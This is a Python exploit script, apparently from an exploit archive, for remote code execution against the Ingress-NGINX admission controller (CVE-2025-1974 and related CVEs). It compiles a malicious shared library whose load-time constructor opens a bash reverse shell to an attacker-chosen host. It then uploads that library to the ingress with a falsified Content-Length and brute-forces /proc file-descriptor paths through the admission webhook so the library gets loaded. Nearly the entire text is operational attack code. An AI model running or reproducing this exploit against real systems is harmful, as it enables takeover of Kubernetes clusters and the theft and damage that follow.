# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE # Date: 2025-10-07 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://kubernetes.io # Software Link: https://github.com/kubernetes/ingress-nginx # Version: Affects v1.10.0 to v1.11.1 (potentially others) # Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster # CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974 import os import sys import socket import requests import threading from urllib.parse import urlparse from concurrent.futures import ThreadPoolExecutor import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # --- Embedded malicious shared object template --- MALICIOUS_C_TEMPLATE = """ #include __attribute__((constructor)) void run_on_load() { system("bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'"); } int bind(void *e, const char *id) { return 1; } void ENGINE_load_evil() {} int bind_engine() { return 1; } """ def compile_shared_library(host, port, output_file="evil_engine.so"): c_code = MALICIOUS_C_TEMPLATE.replace("HOST", host).replace("PORT", str(port)) with open("evil_engine.c", "w") as f: f.write(c_code) print("[*] Compiling malicious shared object...") result = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto") if result == 0: print("[+] Shared object compiled successfully.") return True else: print("[!] Compilation failed. Is gcc installed?") return False def send_brute_request(admission_url, json_template, proc, fd): print(f"[*] Trying /proc/{proc}/fd/{fd}") path = f"proc/{proc}/fd/{fd}" payload = json_template.replace("REPLACE", path) headers = {"Content-Type": "application/json"} url = admission_url.rstrip("/") + "/admission" try: response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5) print(f"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}") except Exception as e: print(f"[!] Error on /proc/{proc}/fd/{fd}: {e}") def brute_force_admission(admission_url, json_file="review.json", max_proc=50, max_fd=30, max_workers=5): try: with open(json_file, "r") as f: json_data = f.read() except FileNotFoundError: print(f"[!] Error: {json_file} not found.") return print("[*] Starting brute-force against the admission webhook...") with ThreadPoolExecutor(max_workers=max_workers) as executor: for proc in range(1, max_proc): for fd in range(3, max_fd): executor.submit(send_brute_request, admission_url, json_data, proc, fd) def upload_shared_library(ingress_url, shared_object="evil_engine.so"): try: with open(shared_object, "rb") as f: evil_payload = f.read() except FileNotFoundError: print(f"[!] Error: {shared_object} not found.") return parsed = urlparse(ingress_url) host = parsed.hostname port = parsed.port or 80 path = parsed.path or "/" try: sock = socket.create_connection((host, port)) except Exception as e: print(f"[!] Failed to connect to {host}:{port}: {e}") return fake_length = len(evil_payload) + 10 headers = ( f"POST {path} HTTP/1.1\r\n" f"Host: {host}\r\n" f"User-Agent: qmx-ingress-exploiter\r\n" f"Content-Type: application/octet-stream\r\n" f"Content-Length: {fake_length}\r\n" f"Connection: keep-alive\r\n\r\n" ).encode("iso-8859-1") print("[*] Uploading malicious shared object to ingress...") sock.sendall(headers + evil_payload) response = b"" while True: chunk = sock.recv(4096) if not chunk: break response += chunk print("[*] Server response:\n") print(response.decode(errors="ignore")) sock.close() def main(): if len(sys.argv) != 4: print("Usage: python3 exploit.py ") sys.exit(1) ingress_url = sys.argv[1] admission_url = sys.argv[2] rev_host_port = sys.argv[3] if ':' not in rev_host_port: print("[!] Invalid format for rev_host:port.") sys.exit(1) host, port = rev_host_port.split(":") if not compile_shared_library(host, port): sys.exit(1) # Send the malicious shared object and keep the connection open upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,)) upload_thread.start() # Simultaneously brute-force the admission webhook for valid file descriptors brute_force_admission(admission_url) if __name__ == "__main__": main()